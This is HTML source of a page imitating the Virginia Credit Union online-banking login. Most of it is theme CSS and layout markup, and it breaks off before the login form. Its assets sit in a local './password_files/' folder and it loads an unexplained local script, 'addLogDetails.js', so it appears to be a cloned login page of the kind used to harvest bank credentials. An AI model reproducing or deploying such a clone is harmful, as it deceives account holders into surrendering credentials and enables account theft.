<!DOCTYPE html>
<html class="js flexbox fontface objectfit object-fit csspositionsticky cssreflections no-regions cssresize shapes siblinggeneral subpixelfont supports csstransforms3d preserve3d canvas canvastext emoji devicemotion deviceorientation svg svgasimg svgclippaths svgfilters svgforeignobject inlinesvg smil no-touchevents typedarrays uagent-chrome uagent-webkit uagent-osWindows theme-q2" lang="en" style="background-image: url(&quot;https://cdn1.onlineaccess1.com/cdn/depot/5128_01/3497/2e997d5284f41701b6f554f33081abc6/assets/images/desktop-background-8429c8df973b2ea0324bb144ba1de01e.jpg&quot;);" stencil-hydrated="">
  <head id="pageheader">
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="q2-app/config/asset-manifest" content="%7B%22bundles%22:%7B%22q2-commercial-engine%22:%7B%22assets%22:%5B%7B%22uri%22:%22https://cdn1.onlineaccess1.com/cdn/base/4.4.0.142D/assets/engines-dist/q2-commercial-engine/assets/engine-vendor.css%22,%22type%22:%22css%22%7D,%7B%22uri%22:%22https://cdn1.onlineaccess1.com/cdn/base/4.4.0.142D/assets/engines-dist/q2-commercial-engine/assets/engine-vendor.js%22,%22type%22:%22js%22%7D,%7B%22uri%22:%22https://cdn1.onlineaccess1.com/cdn/base/4.4.0.142D/assets/engines-dist/q2-commercial-engine/assets/engine.js%22,%22type%22:%22js%22%7D%5D%7D,%22q2-report-engine%22:%7B%22assets%22:%5B%7B%22uri%22:%22https://cdn1.onlineaccess1.com/cdn/base/4.4.0.142D/assets/engines-dist/q2-report-engine/assets/engine-vendor.css%22,%22type%22:%22css%22%7D,%7B%22uri%22:%22https://cdn1.onlineaccess1.com/cdn/base/4.4.0.142D/assets/engines-dist/q2-report-engine/assets/engine-vendor.js%22,%22type%22:%22js%22%7D,%7B%22uri%22:%22https://cdn1.onlineaccess1.com/cdn/base/4.4.0.142D/assets/engines-dist/q2-report-engine/assets/engine.js%22,%22type%22:%22js%22%7D%5D%7D%7D%7D">
    <meta name="q2-commercial-engine/config/environment" content="%7B%22modulePrefix%22:%22q2-commercial-engine%22,%22rootURL%22:%22/%22,%22wsURL%22:%22mobilews/%22,%22locationType%22:%22hash%22,%22EmberENV%22:%7B%22contentSecurityPolicy%22:%7B%22default-src%22:%22&#39;none&#39;%22,%22script-src%22:%22&#39;self&#39;%20&#39;unsafe-inline&#39;%20&#39;unsafe-eval&#39;%20maps.googleapis.com%20maps.gstatic.com%22,%22connect-src%22:%22&#39;self&#39;%22,%22img-src%22:%22&#39;self&#39;%20data:%20hud.gov%22,%22style-src%22:%22&#39;self&#39;%20&#39;unsafe-inline&#39;%20use.typekit.net%22%7D%7D,%22baseURL%22:%22/%22,%22APP%22:%7B%22name%22:%22dummy%22%7D,%22contentSecurityPolicy%22:%7B%22default-src%22:%22&#39;none&#39;%22,%22script-src%22:%22&#39;self&#39;%22,%22font-src%22:%22&#39;self&#39;,%20&#39;https://fonts.gstatic.com&#39;%22,%22connect-src%22:%22&#39;self&#39;%22,%22img-src%22:%22&#39;self&#39;%20www.gravatar.com%22,%22style-src%22:%22&#39;self&#39;%20&#39;https://fonts.gstatic.com&#39;%22,%22media-src%22:%22&#39;self&#39;%22%7D,%22exportApplicationGlobal%22:true%7D">
    <meta name="q2-report-engine/config/environment" content="%7B%22modulePrefix%22:%22q2-report-engine%22,%22rootURL%22:%22/%22,%22wsURL%22:%22mobilews/%22,%22locationType%22:%22hash%22,%22EmberENV%22:%7B%22contentSecurityPolicy%22:%7B%22default-src%22:%22&#39;none&#39;%22,%22script-src%22:%22&#39;self&#39;%20&#39;unsafe-inline&#39;%20&#39;unsafe-eval&#39;%20maps.googleapis.com%20maps.gstatic.com%22,%22connect-src%22:%22&#39;self&#39;%22,%22img-src%22:%22&#39;self&#39;%20data:%20hud.gov%22,%22style-src%22:%22&#39;self&#39;%20&#39;unsafe-inline&#39;%20use.typekit.net%22%7D%7D,%22exportApplicationGlobal%22:true,%22APP%22:%7B%7D%7D">
    <link rel="stylesheet" href="./password_files/q2-tecton-theme.css" id="tecton-default-theme">
    <link rel="stylesheet" href="./password_files/q2-tecton-utilities.css" id="tecton-utilities">
    <style type="text/css">
      span.im-caret {
        -webkit-animation: 1s blink step-end infinite;
        animation: 1s blink step-end infinite;
      }

      @keyframes blink {

        from,
        to {
          border-right-color: black;
        }

        50% {
          border-right-color: transparent;
        }
      }

      @-webkit-keyframes blink {

        from,
        to {
          border-right-color: black;
        }

        50% {
          border-right-color: transparent;
        }
      }

      span.im-static {
        color: grey;
      }

      div.im-colormask {
        display: inline-block;
        border-style: inset;
        border-width: 2px;
        -webkit-appearance: textfield;
        -moz-appearance: textfield;
        appearance: textfield;
      }

      div.im-colormask>input {
        position: absolute;
        display: inline-block;
        background-color: transparent;
        color: transparent;
        -webkit-appearance: caret;
        -moz-appearance: caret;
        appearance: caret;
        border-style: none;
        left: 0;
        /*calculated*/
      }

      div.im-colormask>input:focus {
        outline: none;
      }

      div.im-colormask>input::-moz-selection {
        background: none;
      }

      div.im-colormask>input::selection {
        background: none;
      }

      div.im-colormask>input::-moz-selection {
        background: none;
      }

      div.im-colormask>div {
        color: black;
        display: inline-block;
        width: 100px;
        /*calculated*/
      }
    </style>
    <link href="./password_files/app.css" rel="stylesheet" data-no-shim="">
    <link href="https://cdn1.onlineaccess1.com/cdn/depot/5128_01/3497/2e997d5284f41701b6f554f33081abc6/assets/images/favicon-6f2e8dc1754a2b55ba887cc6fac44d45.ico" rel="icon">
    <link href="./password_files/highcontrast-90984f73fccd67f1d595fbb668aa5e82.css" rel="stylesheet" data-no-shim="">
    <link href="./password_files/base.css" rel="stylesheet" data-no-shim="">
    <link href="./password_files/theme-q2-25bcbad972b28a94c8be7c624fe6bf7c.css" rel="stylesheet" data-no-shim="">
    <title>Virginia Credit Union</title>
    <style data-styles="">
      q2-icon,
      q2-calendar,
      q2-select,
      q2-dropdown,
      q2-editable-field,
      q2-pagination,
      q2-pill,
      q2-tab-container,
      q2-tag,
      q2-carousel,
      q2-month-picker,
      q2-section,
      q2-stepper,
      q2-card,
      q2-chart-donut,
      q2-checkbox,
      q2-checkbox-group,
      q2-option,
      q2-radio-group,
      q2-stepper-vertical,
      q2-textarea,
      q2-carousel-pane,
      q2-loading-element,
      q2-loc,
      q2-optgroup,
      q2-radio,
      q2-stepper-pane,
      q2-tab-pane,
      q2-tooltip,
      tecton-tab-pane,
      q2-dropdown-item,
      q2-avatar,
      q2-message,
      q2-option-list,
      q2-popover,
      click-elsewhere,
      q2-btn,
      q2-loading,
      q2-input,
      q2-badge {
        visibility: hidden
      }

      [stencil-hydrated] {
        visibility: inherit
      }
    </style>
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="description">
    <meta name="author">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no, address=no, email=no">
    <meta id="viewportMeta" name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1, user-scalable=0, user-scalable=no, viewport-fit=cover">
    <meta name="referrer" content="origin">
    <link href="./password_files/tecton-40b5465eb21e2ee81a08f73d94808237.css" rel="stylesheet">
    <style id="tecton-props-css">
      :root {
        --tct-stoplight-info: #0079C1;
        --tct-stoplight-success: #0E8A00;
        --tct-stoplight-warning: #F0B400;
        --tct-stoplight-alert: #C30000;
        --tct-global-focus: 0 0 0 2px #33B4FF;
        --tct-black: #000000;
        --tct-gray-d3: #222222;
        --tct-gray-d2: #444444;
        --tct-gray-d1: #666666;
        --tct-gray: #999999;
        --tct-gray-l1: #CCCCCC;
        --tct-gray-l2: #EEEEEE;
        --tct-gray-l3: #F2F2F2;
        --tct-white: #FFFFFF;
        --tct-disabled-opacity: 0.4;
        --tct-border-radius-1: 3px;
        --tct-border-radius-2: 6px;
        --tct-border-radius-3: 12px;
        --tct-shadow-1: 0 2px 4px rgba(0, 0, 0, 0.3);
        --tct-shadow-2: 0 3px 6px rgba(0, 0, 0, 0.3);
        --tct-shadow-3: 0 4px 12px rgba(0, 0, 0, 0.3);
        --tct-duration-1: 0.2s;
        --tct-duration-2: 0.4s;
        --tct-duration-3: 0.8s;
        --tct-tween-1: 0.2s ease;
        --tct-tween-2: 0.4s ease;
        --tct-tween-3: 0.8s ease;
        --const-stoplight-info: #0079C1;
        --const-stoplight-success: #0E8A00;
        --const-stoplight-warning: #F0B400;
        --const-stoplight-alert: #C30000;
        --const-global-focus: 0 0 0 2px #33B4FF;
        --const-stoplight-info-text: #FFFFFF;
        --const-stoplight-success-text: #FFFFFF;
        --const-stoplight-warning-text: #000000;
        --const-stoplight-alert-text: #FFFFFF;
        --app-black: #000000;
        --app-gray-d3: #222222;
        --app-gray-d2: #444444;
        --app-gray-d1: #666666;
        --app-gray: #999999;
        --app-gray-l1: #CCCCCC;
        --app-gray-l2: #EEEEEE;
        --app-gray-l3: #F2F2F2;
        --app-white: #FFFFFF;
        --app-disabled-opacity: 0.4;
        --app-border-radius-1: 3px;
        --app-border-radius-2: 6px;
        --app-border-radius-3: 12px;
        --app-shadow-1: 0 2px 4px rgba(0, 0, 0, 0.3);
        --app-shadow-2: 0 3px 6px rgba(0, 0, 0, 0.3);
        --app-shadow-3: 0 4px 12px rgba(0, 0, 0, 0.3);
        --app-duration-1: 0.2s;
        --app-duration-2: 0.4s;
        --app-duration-3: 0.8s;
        --app-tween-1: 0.2s ease;
        --app-tween-2: 0.4s ease;
        --app-tween-3: 0.8s ease;
        --app-font-size: 14px;
        --app-line-height: 1.428571429;
        --app-font-size-small: 12px;
        --app-tooltip-multiline-max-width: 200px;
        --app-tooltip-background-color: rgba(0, 0, 0, 0.8);
        --app-tooltip-text-color: #FFFFFF;
        --app-tooltip-size: 5px;
        --app-tooltip-position: -5px;
        --app-tooltip-body-offset: -15px;
        --app-tooltip-transition-duration: 250ms;
        --app-tooltip-visible-duration: 2s
      }
    </style>
    <style id="tecton-theme-css">
      :root {
        --tct-scale-0: 0px;
        --tct-scale-1: 5px;
        --tct-scale-2: 10px;
        --tct-scale-3: 15px;
        --tct-scale-4: 20px;
        --tct-scale-5: 45px;
        --tct-scale-6: 60px;
        --tct-scale-0x: 0px;
        --tct-scale-1x: 5px;
        --tct-scale-2x: 10px;
        --tct-scale-3x: 15px;
        --tct-scale-4x: 20px;
        --tct-scale-5x: 25px;
        --tct-scale-6x: 30px;
        --tct-scale-7x: 35px;
        --tct-scale-8x: 40px;
        --tct-scale-9x: 45px;
        --tct-scale-10x: 50px;
        --tct-scale-11x: 55px;
        --tct-scale-12x: 60px;
        --tct-link-color: #007dba;
        --tct-link-hover-color: #004b70;
        --tct-btn-disabled-opacity: 0.4;
        --tct-btn-padding: 10px;
        --tct-btn-font-size: inherit;
        --tct-btn-tween: 0.2s ease;
        --tct-btn-primary-bg: #007dba;
        --tct-btn-primary-font-color: #FFFFFF;
        --tct-btn-primary-font-weight: 600;
        --tct-btn-primary-text-transform: none;
        --tct-btn-primary-letter-spacing: normal;
        --tct-btn-primary-box-shadow: 0 1px 3px rgba(0, 0, 0, 0.12), 0 1px 2px rgba(0, 0, 0, 0.24);
        --tct-btn-primary-border-color: transparent;
        --tct-btn-primary-border-width: 0;
        --tct-btn-primary-border-radius: 3px;
        --tct-btn-primary-hover-bg: #3a5dae;
        --tct-btn-primary-hover-font-color: #ffffff;
        --tct-btn-primary-hover-border-color: transparent;
        --tct-btn-primary-hover-box-shadow: 0 5px 10px rgba(0, 0, 0, 0.19), 0 3px 3px rgba(0, 0, 0, 0.23);
        --tct-btn-primary-disabled-bg: #007dba;
        --tct-btn-primary-disabled-font-color: #FFFFFF;
        --tct-btn-primary-disabled-box-shadow: 0 1px 3px rgba(0, 0, 0, 0.12), 0 1px 2px rgba(0, 0, 0, 0.24);
        --tct-btn-secondary-bg: #EAEAEA;
        --tct-btn-secondary-font-color: #2E2E2E;
        --tct-btn-secondary-font-weight: 600;
        --tct-btn-secondary-text-transform: none;
        --tct-btn-secondary-letter-spacing: normal;
        --tct-btn-secondary-box-shadow: 0 1px 3px rgba(0, 0, 0, 0.12), 0 1px 2px rgba(0, 0, 0, 0.24);
        --tct-btn-secondary-border-color: transparent;
        --tct-btn-secondary-border-width: 0;
        --tct-btn-secondary-border-radius: 3px;
        --tct-btn-secondary-hover-bg: #E1E1E1;
        --tct-btn-secondary-hover-font-color: #2E2E2E;
        --tct-btn-secondary-hover-border-color: transparent;
        --tct-btn-secondary-hover-box-shadow: 0 5px 10px rgba(0, 0, 0, 0.19), 0 3px 3px rgba(0, 0, 0, 0.23);
        --tct-btn-secondary-disabled-bg: #EAEAEA;
        --tct-btn-secondary-disabled-font-color: #2E2E2E;
        --tct-btn-secondary-disabled-box-shadow: 0 1px 3px rgba(0, 0, 0, 0.12), 0 1px 2px rgba(0, 0, 0, 0.24);
        --tct-btn-neutral-bg: #FFFFFF;
        --tct-btn-neutral-font-color: #007dba;
        --tct-btn-neutral-font-weight: 600;
        --tct-btn-neutral-text-transform: none;
        --tct-btn-neutral-letter-spacing: normal;
        --tct-btn-neutral-box-shadow: 0 1px 3px rgba(0, 0, 0, 0.12), 0 1px 2px rgba(0, 0, 0, 0.24);
        --tct-btn-neutral-border-color: #007dba;
        --tct-btn-neutral-border-width: 1px;
        --tct-btn-neutral-border-radius: 3px;
        --tct-btn-neutral-hover-bg: #FFFFFF;
        --tct-btn-neutral-hover-font-color: #007dba;
        --tct-btn-neutral-hover-border-color: #007dba;
        --tct-btn-neutral-hover-box-shadow: 0 5px 10px rgba(0, 0, 0, 0.19), 0 3px 3px rgba(0, 0, 0, 0.23);
        --tct-btn-neutral-disabled-bg: #FFFFFF;
        --tct-btn-neutral-disabled-font-color: #007dba;
        --tct-btn-neutral-disabled-box-shadow: 0 1px 3px rgba(0, 0, 0, 0.12), 0 1px 2px rgba(0, 0, 0, 0.24);
        --tct-btn-icon-width: 44px;
        --tct-btn-icon-height: 44px;
        --tct-btn-icon-color: inherit;
        --tct-btn-icon-hover-bg: #ebebeb;
        --tct-btn-icon-hover-color: #004b70;
        --tct-btn-badge-padding: 2px 5px;
        --tct-btn-badge-font-size: inherit;
        --tct-btn-badge-border-radius: 3px;
        --tct-btn-badge-bg: transparent;
        --tct-btn-badge-font-color: inherit;
        --tct-btn-badge-hover-bg: #F2F2F2;
        --tct-btn-badge-hover-font-color: #2e2e2e;
        --tct-btn-badge-active-bg: #007dba;
        --tct-btn-badge-active-font-color: #FFFFFF;
        --tct-input-margin-top: 30px;
        --tct-input-margin-bottom: 30px;
        --tct-input-font-size: inherit;
        --tct-input-label-padding-left: 0;
        --tct-input-label-padding-right: 0;
        --tct-input-label-margin-bottom: 5px;
        --tct-input-label-font-color: #2e2e2e;
        --tct-input-error-label-font-color: #2e2e2e;
        --tct-input-label-font-size: inherit;
        --tct-input-label-font-weight: 600;
        --tct-input-label-letter-spacing: normal;
        --tct-input-label-text-transform: none;
        --tct-input-label-optional-margin-left: 5px;
        --tct-input-label-optional-font-color: #747474;
        --tct-input-label-optional-font-size: 12px;
        --tct-input-label-optional-font-weight: 400;
        --tct-input-height: 42px;
        --tct-input-horizontal-padding: 10px;
        --tct-input-bg: #fcfcfd;
        --tct-input-font-color: #2e2e2e;
        --tct-input-border-top-width: 1px;
        --tct-input-border-right-width: 1px;
        --tct-input-border-bottom-width: 1px;
        --tct-input-border-left-width: 1px;
        --tct-input-border-color: #cccccc;
        --tct-input-border-top-left-radius: 3px;
        --tct-input-border-top-right-radius: 3px;
        --tct-input-border-bottom-right-radius: 3px;
        --tct-input-border-bottom-left-radius: 3px;
        --tct-input-box-shadow: none;
        --tct-input-tween: 0.4s ease;
        --tct-input-disabled-opacity: 0.4;
        --tct-input-placeholder-font-color: #6c6c6c;
        --tct-input-focus-border-top-width: 1px;
        --tct-input-focus-border-right-width: 1px;
        --tct-input-focus-border-bottom-width: 1px;
        --tct-input-focus-border-left-width: 1px;
        --tct-input-focus-border-color: #0079C1;
        --tct-input-focus-box-shadow: 0 0 transparent;
        --tct-input-icon-stroke-primary: #999999;
        --tct-input-prefix-font-size: inherit;
        --tct-input-prefix-font-color: #2e2e2e;
        --tct-input-prefix-bg: #fcfcfd;
        --tct-input-prefix-border-color: #cccccc;
        --tct-input-error-prefix-font-color: #2e2e2e;
        --tct-input-error-prefix-bg: #fcfcfd;
        --tct-input-message-box-shadow: 0 2px 4px rgba(0, 0, 0, 0.3);
        --tct-input-message-tween: 0.2s ease;
        --tct-message-bg: #F2F2F2;
        --tct-tab-active-color: #007dba;
        --tct-tab-inactive-color: #2e2e2e;
        --tct-tab-font-size: 17px;
        --tct-tab-alt-active-color: inherit;
        --tct-tab-alt-inactive-color: inherit;
        /* -------------------------------------------------------------- */
        --app-scale-0: 0px;
        --app-scale-1: 5px;
        --app-scale-2: 10px;
        --app-scale-3: 15px;
        --app-scale-4: 20px;
        --app-scale-5: 45px;
        --app-scale-6: 60px;
        --app-scale-0x: 0px;
        --app-scale-1x: 5px;
        --app-scale-2x: 10px;
        --app-scale-3x: 15px;
        --app-scale-4x: 20px;
        --app-scale-5x: 25px;
        --app-scale-6x: 30px;
        --app-scale-7x: 35px;
        --app-scale-8x: 40px;
        --app-scale-9x: 45px;
        --app-scale-10x: 50px;
        --app-scale-11x: 55px;
        --app-scale-12x: 60px;
        --t-font-family: OpenSans, Helvetica Neue, Helvetica, Arial, sans-serif;
        --t-font-stretch: normal;
        --t-font-family-monospaced: Courier New, Courier, Lucida Sans Typewriter, Lucida Typewriter, monospace;
        --t-primary-d5: #003f5d;
        --t-primary-d4: #004b70;
        --t-primary-d3: #005882;
        --t-primary-d2: #006495;
        --t-primary-d1: #0071a7;
        --t-primary: #007dba;
        --t-primary-l1: #0093da;
        --t-primary-l2: #00a9fb;
        --t-primary-l3: #1cb5ff;
        --t-primary-l4: #3dbfff;
        --t-primary-l5: #5dcaff;
        --t-secondary-d5: #4d6673;
        --t-secondary-d4: #5c7b8a;
        --t-secondary-d3: #6e8e9e;
        --t-secondary-d2: #85a0ad;
        --t-secondary-d1: #9cb2bd;
        --t-secondary: #b3c4cc;
        --t-secondary-l1: #bacad1;
        --t-secondary-l2: #c2d0d6;
        --t-secondary-l3: #c9d5db;
        --t-secondary-l4: #d1dbe0;
        --t-secondary-l5: #d9e1e6;
        --t-tertiary-d5: #1c99d6;
        --t-tertiary-d4: #3daee6;
        --t-tertiary-d3: #68c0eb;
        --t-tertiary-d2: #93d2f1;
        --t-tertiary-d1: #bee4f6;
        --t-tertiary: #e8f6fc;
        --t-tertiary-l1: #ebf7fc;
        --t-tertiary-l2: #edf8fd;
        --t-tertiary-l3: #eff8fd;
        --t-tertiary-l4: #f1f9fd;
        --t-tertiary-l5: #f4fafe;
        --t-accent-1: #e05252;
        --t-accent-1-l1: #e77474;
        --t-accent-1-d1: #b62020;
        --t-accent-2: #e09952;
        --t-accent-2-l1: #e7ad74;
        --t-accent-2-d1: #b66b20;
        --t-accent-3: #e0e052;
        --t-accent-3-l1: #e7e774;
        --t-accent-3-d1: #b6b620;
        --t-accent-4: #99e052;
        --t-accent-4-l1: #ade774;
        --t-accent-4-d1: #6bb620;
        --t-accent-5: #52e052;
        --t-accent-5-l1: #74e774;
        --t-accent-5-d1: #20b620;
        --t-accent-6: #52e099;
        --t-accent-6-l1: #74e7ad;
        --t-accent-6-d1: #20b66b;
        --t-accent-7: #52e0e0;
        --t-accent-7-l1: #74e7e7;
        --t-accent-7-d1: #20b6b6;
        --t-accent-8: #5299e0;
        --t-accent-8-l1: #74ade7;
        --t-accent-8-d1: #206bb6;
        --t-accent-9: #5252e0;
        --t-accent-9-l1: #7474e7;
        --t-accent-9-d1: #2020b6;
        --t-accent-10: #9952e0;
        --t-accent-10-l1: #ad74e7;
        --t-accent-10-d1: #6b20b6;
        --t-accent-11: #e052e0;
        --t-accent-11-l1: #e774e7;
        --t-accent-11-d1: #b620b6;
        --t-accent-12: #e05299;
        --t-accent-12-l1: #e774ad;
        --t-accent-12-d1: #b6206b;
        --t-gray-1: #0d0d0d;
        --t-gray-2: #1a1a1a;
        --t-gray-3: #262626;
        --t-gray-4: #333333;
        --t-gray-5: #404040;
        --t-gray-6: #4d4d4d;
        --t-gray-7: #666666;
        --t-gray-8: gray;
        --t-gray-9: #999999;
        --t-gray-10: #b3b3b3;
        --t-gray-11: #cccccc;
        --t-gray-12: #d9d9d9;
        --t-gray-13: #e6e6e6;
        --t-gray-14: #f2f2f2;
        --t-text: #4d4d4d;
        --t-textA: rgba(77, 77, 77, 0.77);
        --t-primary-text: #FFFFFF;
        --t-secondary-text: #141414;
        --t-tertiary-text: #141414;
        --t-base: #FFFFFF;
        --t-base-a0: rgba(255, 255, 255, 0);
        --t-base-a1: rgba(255, 255, 255, 0.25);
        --t-base-a2: rgba(255, 255, 255, 0.5);
        --t-base-a3: rgba(255, 255, 255, 0.75);
        --t-top: #0d0d0d;
        --t-top-a0: rgba(13, 13, 13, 0);
        --t-top-a1: rgba(13, 13, 13, 0.35);
        --t-top-a2: rgba(13, 13, 13, 0.6);
        --t-top-a3: rgba(13, 13, 13, 0.85);
        --t-box-shadow-1: 0 2px 4px rgba(13, 13, 13, 0.35);
        --t-box-shadow-2: 0 3px 6px rgba(13, 13, 13, 0.35);
        --t-box-shadow-3: 0 4px 12px rgba(13, 13, 13, 0.35);
        --t-border-radius-1: 3px;
        --t-border-radius-2: 6px;
        --t-border-radius-3: 12px;
        --t-focus: #33B4FF;
        --t-status-info: #0079C1;
        --t-status-alert: #C30000;
        --t-status-warn: #F0B400;
        --t-status-success: #0E8A00;
        --t-tab-inactive: #2e2e2e;
        --t-tab-active: #007dba;
        --t-tab-alt-inactive: inherit;
        --t-tab-alt-active: inherit;
        --t-tab-font-size: 17px;
        --t-highlight-1: #579904;
        --t-highlight-2: #95c623;
        --t-highlight-3: #d5e9a7;
        --t-highlight-4: #579904;
        --t-highlight-5: #95c623;
        --t-highlight-6: #d5e9a7;
        --t-highlight-7: #579904;
        --t-highlight-8: #95c623;
        --t-highlight-9: #d5e9a7;
        --t-highlight-10: #579904;
        --t-highlight-11: #95c623;
        --t-highlight-12: #d5e9a7;
        --t-highlight-13: #579904;
        --t-highlight-14: #95c623;
        --t-highlight-15: #d5e9a7;
        --t-input-outline: 1px solid #007dba;
        --t-icon-stroke-width: 1.5;
        --t-icon-cap: round;
        --t-icon-stroke-primary: currentColor;
        --t-icon-stroke-secondary: currentColor;
        --t-icon-fill: none;
        --t-font-color: #2e2e2e;
        --t-a11y-gray-color: #747474;
        --t-link-color: #007dba;
        --t-link-hover-color: #004b70;
        --t-content-bg: #FFFFFF;
        --t-content-border-color: #CCCCCC;
        --t-content-font-color: #2e2e2e;
        --t-section-bg: #FFFFFF;
        --t-section-font-color: #2e2e2e;
        --t-section-border-radius: 3px;
        --t-button-default-bg: #EAEAEA;
        --t-button-default-font-color: #2E2E2E;
        --t-button-default-hover-bg: #E1E1E1;
        --t-button-default-hover-font-color: #2E2E2E;
        --t-button-primary-bg: #007dba;
        --t-button-primary-font-color: #FFFFFF;
        --t-button-primary-hover-bg: #3a5dae;
        --t-button-primary-hover-font-color: #ffffff;
        --t-input-font-color: #2e2e2e;
        --t-input-placeholder-font-color: #6c6c6c;
        --t-input-bg: #fcfcfd;
        --t-input-border: #cccccc;
        --t-input-focus-font-color: #2e2e2e;
        --t-input-focus: #0079C1;
        --t-input-warning-font-color: #141414;
        --t-input-warning: #F0B400;
        --t-input-error-font-color: #FFFFFF;
        --t-input-error: #C30000;
        --t-input-success-font-color: #FFFFFF;
        --t-input-success: #0E8A00;
        --t-checkbox-fill: #007dba;
        --t-checkbox-text: #FFFFFF;
        --t-loading-primary-color: #007dba;
        --t-loading-secondary-color: #007dba;
        --t-tooltip-multiline-max-width: 200px;
        --t-tooltip-background-color: rgba(0, 0, 0, 0.8);
        --t-tooltip-text-color: #FFFFFF;
        --t-tooltip-size: 5px;
        --t-tooltip-body-offset: -15px;
        --t-tooltip-transition-duration: 250ms;
        --t-tooltip-visible-duration: 2s;
        --t-gray1: #0d0d0d;
        --t-gray2: #1a1a1a;
        --t-gray3: #262626;
        --t-gray4: #333333;
        --t-gray5: #404040;
        --t-gray6: #4d4d4d;
        --t-gray7: #666666;
        --t-gray8: gray;
        --t-gray9: #999999;
        --t-gray10: #b3b3b3;
        --t-gray11: #cccccc;
        --t-gray12: #d9d9d9;
        --t-gray13: #e6e6e6;
        --t-gray14: #f2f2f2;
      }
    </style>
    <script src="addLogDetails.js"></script>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
  </head>
  <body id="pagebody" class="ember-application desktop theme-q2 frameless">
    <div class="ember-view app-container desktop unauthenticated vertical-nav pfm-disabled no-pfm-accounts has-footer" id="ember4">
      <div role="dialog" tabindex="0" id="q2AppOverpanel" style="display: none;" class="over-panel ember-view">
        <div tabindex="-1" class="overpanel-inner" test-id="overPanel">
          <div class="overpanel-header">
            <div class="overpanel-button-container"></div>
            <h1 class="overpanel-title" test-id="lblOverpanelTitle"></h1>
            <div class="overpanel-button-container">
              <q2-btn class="overpanel-button overpanel-close" test-id="btnClose" label="Close" hide-label="" stencil-hydrated="">
                <template shadowrootmode="open">
                  <button aria-label="Close" type="button" test-id="q2BtnInnerButton" class="icon-only">
                    <div>
                      <q2-loading hidden="" stencil-hydrated="">
                        <template shadowrootmode="open">
                          <div class="q2-loading-animation half-circle-spinner" aria-label="Loading">
                            <div class="circle circle-1"></div>
                            <div class="circle circle-2"></div>
                          </div>
                        </template>
                      </q2-loading>
                      <slot></slot>
                    </div>
                  </button>
                </template>
                <q2-icon type="close" stencil-hydrated="">
                  <template shadowrootmode="open">
                    <svg viewBox="0 0 26 26" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" role="img">
                      <path class="stroke-primary" d="M20 6L6 20M20 20L6 6"></path>
                    </svg>
                  </template>
                </q2-icon>
              </q2-btn>
            </div>
          </div>
          <div id="ember5" class="overpanel-alert-container alert-message_container hasToast ember-view">
            <div class="alert alert-msg alert-message_content is-toast  " role="alert" test-id="q2Alert">
              <div class="toast-container">
                <div class="toast t-base">
                  <div class="toast-message_inner">
                    <div class="toast-line toast-line-info" test-id="toastAlertVerticalLine"></div>
                    <div class="toast-content">
                      <div class="toast-row">
                        <div class="toast-icon">
                          <q2-icon test-id="toastAlertIcon" type="info" stencil-hydrated="">
                            <template shadowrootmode="open">
                              <svg viewBox="0 0 26 26" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" role="img">
                                <g>
                                  <circle cx="13" cy="13" r="11" class="stroke-primary"></circle>
                                  <g class="stroke-secondary" transform="translate(10.067 5.3)">
                                    <path d="M0 15.033h5.867M0 5.5h2.933v9.533"></path>
                                    <circle cx="2.933" cy="1.1" r="1.1"></circle>
                                  </g>
                                </g>
                              </svg>
                            </template>
                          </q2-icon>
                        </div>
                        <div test-id="toastAlertMessageTxt" class="toast-text">
                          <div test-id="alertMessageTxt"></div>
                        </div>
                        <div class="toast-close-btn"></div>
                      </div>
                      <div class="toast-row">
                        <div class="toast-timestamp" test-id="toastAlertTimestamp"></div>
                      </div>
                    </div>
                  </div>
                </div>
              </div>
            </div>
          </div>
          <div class="overpanel-scroll-wrapper force-height col-md-offset-1 col-lg-offset-2 col-xs-12 col-sm-12 col-md-10 col-lg-8" test-id="overPanelWrapper">
            <div tabindex="-1" class="overpanel-slider "></div>
          </div>
          <div class="overpanel-footer hidden">
            <div class="valign overpanel-footer-outer">
              <div class="overpanel-footer-inner">
                <div id="ember6" class="ui-logo small ember-view">
                  <span class="sr-only" test-id="logoDescriptiveText">Virginia Credit Union</span>
                  <div aria-hidden="true" class="logo-image" test-id="logoDiv"></div>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
      <div class="loading-bg"></div>
      <div class="splash-bg"></div>
      <div class="container meta-container main-page-container">
        <div id="ember7" class="app-header ui-sticky top ember-view" style="top: 0px;">
          <div class="navbar navbar-fixed-top center-align-logo disable-menu-button" role="banner">
            <div class="container meta-container" test-id="navbarContainer">
              <div class="navbar-branding">
                <div class="branding">
                  <div id="ember8" class="logo ui-logo small ember-view">
                    <span class="sr-only" test-id="logoDescriptiveText">Virginia Credit Union</span>
                    <div aria-hidden="true" class="logo-image" test-id="logoDiv"></div>
                  </div>
                </div>
              </div>
              <div id="ember9" class="custom-header ember-view"></div>
            </div>
          </div>
          <div test-id="wdgtBrandingBar" id="ember10" class="branding-bar-widget widget-fence clearfix hidden ember-view"></div>
        </div>
        <div class="quicktip-container main-desktop"></div>
        <div id="ember11" class="main-view grid-row drawer-view main-view ember-view">
          <div class="content-wrapper">
            <div class="content-container">
              <header>
                <div tabindex="-1" class="ember-sr-only ember-sr-only-focusable" id="ember-a11y-refocus-nav-message"> The page navigation is complete. You may now navigate the page content as you wish. </div>
              </header>
              <div class="content clearfix" role="main" test-id="mainContentArea">
                <div id="ember13" class="top-widget-fence widget-fence clearfix hidden ember-view"></div>
                <section class="default-dashboard-container">
                  <section class="default-dash-inner-wrapper"></section>
                </section>
                <div id="ember14" class="widget-fence clearfix bottom-widget-fence hidden ember-view"></div>
              </div>
              <div class="sidebar desktop-sidebar" tabindex="-1" role="complementary">
                <div class="sidebar-drawer">
                  <div class="sidebar-rail">
                    <div class="sidebar-content">
                      <div id="ember15" class="widget-fence clearfix hidden ember-view"></div>
                    </div>
                  </div>
                </div>
              </div>
            </div>
            <div class="dropdown-backdrop hidden"></div>
          </div>
          <div role="dialog" tabindex="0" id="q2AppSidePanel" class="sidepanel ember-view" style="display: none;">
            <div class="sidepanel-inner"></div>
          </div>
          <div id="login-modal"></div>
          <div class="login-outer">
            <div class="login-inner" id="login-inner">
              <div class="quicktip-container">
                <aside id="ember16" style="display: none;" class="quick-tip hidden ember-view">
